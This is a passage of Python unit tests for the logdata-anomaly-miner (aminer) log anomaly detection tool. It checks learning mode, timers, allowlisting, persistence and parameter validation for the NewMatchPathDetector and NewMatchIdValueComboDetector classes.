{"id": "Default"}, 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], (), 1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, 
self.aminer_config, ["path"], [self.stream_printer_event_handler], set(), 1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 0) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, -1) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, ["default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, None) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, "") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, b"default") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, True) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, {"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, ()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, set()) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 0.1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id="") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=None) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], 
[self.stream_printer_event_handler], ids, 1, persistence_id=b"Default") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=True) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=123) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=123.22) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=["Default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=[]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=set()) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id="Default") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=b"True") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag="True") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=123) self.assertRaises(TypeError, 
NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=123.22) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=["Default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=[]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=set()) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=True) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=b"True") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode="True") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=123) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=123.22) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], 
[self.stream_printer_event_handler], ids, 1, learn_mode=["Default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=[]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=set()) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=None) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=b"True") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline="True") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=123) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=123.22) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=["Default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=[]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], 
[self.stream_printer_event_handler], ids, 1, output_logline=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=set()) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=True) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=set()) NewMatchIdValueComboDetector(self.aminer_config, 
["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=100) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=set()) NewMatchIdValueComboDetector(self.aminer_config, 
["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=100) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list="") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=True) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=123) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=123.22) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=set()) 
NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=["file:///tmp/syslog"]) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/NewMatchPathDetectorTest.py000066400000000000000000000431321500476301700310350ustar00rootroot00000000000000import unittest from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.LogAtom import LogAtom import time from datetime import datetime from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class NewMatchPathDetectorTest(TestBase): """Unittests for the NewMatchPathDetector.""" match_context1 = DummyMatchContext(b" pid=") fdme1 = DummyFixedDataModelElement("s1", b" pid=") match_element1 = fdme1.get_match_element("", match_context1) match_context2 = DummyMatchContext(b"25537 uid=2") fdme2 = DummyFixedDataModelElement("d1", b"25537") match_element2 = fdme2.get_match_element("", match_context2) def test1receive_atom(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. 
        """
        expected_string = '%s New path(s) detected\n%s: "None" (%d lines)\n %s\n\n'
        dtf = "%Y-%m-%d %H:%M:%S"
        # learn_mode = True: the first atom reports its new path, a repeated atom is silent.
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False)
        t = round(time.time(), 3)
        log_atom1 = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, nmpd)
        log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), t, nmpd)
        self.assertTrue(nmpd.receive_atom(log_atom1))
        self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t).strftime(dtf), nmpd.__class__.__name__,
                                                                           1, "['/s1']"))
        self.reset_output_stream()

        # repeating should NOT produce the same result
        self.assertTrue(nmpd.receive_atom(log_atom1))
        self.assertEqual(self.output_stream.getvalue(), "")
        self.reset_output_stream()

        # learn_mode = False: an unknown path is reported every time because it is no longer added to the known set.
        nmpd.learn_mode = False
        self.assertTrue(nmpd.receive_atom(log_atom2))
        self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t).strftime(dtf), nmpd.__class__.__name__,
                                                                           1, "['/d1']"))
        self.reset_output_stream()

        # repeating should produce the same result
        self.assertTrue(nmpd.receive_atom(log_atom2))
        self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t).strftime(dtf), nmpd.__class__.__name__,
                                                                           1, "['/d1']"))

        # stop_learning_time: still learning at t + 99, learning switched off once an atom arrives at t + 101.
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False,
                                    stop_learning_time=100)
        self.assertTrue(nmpd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 99
        self.assertTrue(nmpd.receive_atom(log_atom1))
        self.assertTrue(nmpd.learn_mode)
        log_atom1.atom_time = t + 101
        self.assertTrue(nmpd.receive_atom(log_atom1))
        self.assertFalse(nmpd.learn_mode)

        # stop_learning_no_anomaly_time: log_atom2 (a path this instance has not seen) arrives at t + 100 and learning is
        # still on at t + 200 but off at t + 201 -- the deadline looks like it is re-armed by that atom;
        # NOTE(review): confirm against the detector implementation.
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False,
                                    stop_learning_no_anomaly_time=100)
        log_atom1.atom_time = t
        self.assertTrue(nmpd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 100
        self.assertTrue(nmpd.receive_atom(log_atom1))
        self.assertTrue(nmpd.learn_mode)
        log_atom2.atom_time = t + 100
        self.assertTrue(nmpd.receive_atom(log_atom2))
        self.assertTrue(nmpd.learn_mode)
        log_atom1.atom_time = t + 200
        self.assertTrue(nmpd.receive_atom(log_atom1))
        self.assertTrue(nmpd.learn_mode)
        log_atom1.atom_time = t + 201
        self.assertTrue(nmpd.receive_atom(log_atom1))
        self.assertFalse(nmpd.learn_mode)

    def test2do_timer(self):
        """
        Test if the do_timer method is implemented properly.

        do_timer returns the number of seconds until next_persist_time. Once that time is reached the return value is
        DEFAULT_PERSISTENCE_PERIOD and, as the t + 999 / t + 1000 assertions show, the next deadline is
        next_persist_time + DEFAULT_PERSISTENCE_PERIOD.
        """
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False)
        t = time.time()
        nmpd.next_persist_time = t + 400
        self.assertEqual(nmpd.do_timer(t + 200), 200)
        self.assertEqual(nmpd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD)
        self.assertEqual(nmpd.do_timer(t + 999), 1)
        self.assertEqual(nmpd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD)

    def test3allowlist_event(self):
        """
        Test if the allowlist_event method is implemented properly.

        Covers: rejection of events of another detector class, rejection of extra allowlisting data, and that an allowlisted
        path is added to known_path_set regardless of learn_mode.
        """
        # This test case checks whether an exception is thrown when entering an event of another class.
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False)
        t = round(time.time(), 3)
        analysis = "Analysis.%s"
        log_atom1 = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, nmpd)
        nmpd.receive_atom(log_atom1)
        # An event type belonging to a different detector class must not be allowlisted by this instance.
        self.assertRaises(Exception, nmpd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None)

        # The NewMatchPathDetector can not handle allowlisting data and therefore an exception is expected.
        self.assertRaises(Exception, nmpd.allowlist_event, analysis % nmpd.__class__.__name__, self.output_stream.getvalue(),
                          ["random", "Data"])

        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(nmpd.allowlist_event(analysis % nmpd.__class__.__name__, self.match_element1.path, None),
                         "Allowlisted path(s) %s in %s." % (self.match_element1.path, analysis % nmpd.__class__.__name__))
        self.assertEqual(nmpd.known_path_set, {"/s1"})
        # Allowlisting also extends known_path_set while learn_mode is False.
        nmpd.learn_mode = False
        self.assertEqual(nmpd.allowlist_event(analysis % nmpd.__class__.__name__, self.match_element2.path, None),
                         "Allowlisted path(s) %s in %s." % (self.match_element2.path, analysis % nmpd.__class__.__name__))
        self.assertEqual(nmpd.known_path_set, {"/s1", "/d1"})

    def test4persistence(self):
        """
        Test the do_persist and load_persistence_data methods.

        Checks the exact on-disk representation (a JSON list whose entries carry a "string:" type tag) and that a reload as
        well as a freshly constructed detector yield the same known_path_set.
        """
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False)
        t = round(time.time(), 3)
        log_atom1 = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, nmpd)
        log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), t, nmpd)
        self.assertTrue(nmpd.receive_atom(log_atom1))
        self.assertTrue(nmpd.receive_atom(log_atom2))
        self.assertEqual(nmpd.known_path_set, {"/s1", "/d1"})
        nmpd.do_persist()
        # The persisted order ("/d1" before "/s1") is part of the asserted file content.
        with open(nmpd.persistence_file_name, "r") as f:
            self.assertEqual(f.read(), '["string:/d1", "string:/s1"]')
        nmpd.known_path_set = set()
        nmpd.load_persistence_data()
        self.assertEqual(nmpd.known_path_set, {"/s1", "/d1"})

        # A second instance with the default persistence_id sees the same paths -- presumably loaded during construction.
        other = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=False, output_logline=False)
        self.assertEqual(nmpd.known_path_set, other.known_path_set)

    def test5validate_parameters(self):
        """Test all initialization parameters for the detector.
Input parameters must be validated in the class.""" self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, ["default"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, None) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, "") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, b"Default") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, True) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, 123) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, 123.3) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, {"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, ()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, set()) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, 
[self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=set()) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode="True") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=set()) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, 
[self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=set()) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, 
stop_learning_time=["Default"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, 
stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=set()) NewMatchPathDetector(self.aminer_config, 
[self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"])


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/NewMatchPathValueComboDetectorTest.py000066400000000000000000000633311500476301700330150ustar00rootroot00000000000000
import unittest
from aminer.parsing.ParserMatch import ParserMatch
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector
from aminer.input.LogAtom import LogAtom
import time
from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummySequenceModelElement
from datetime import datetime
from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD


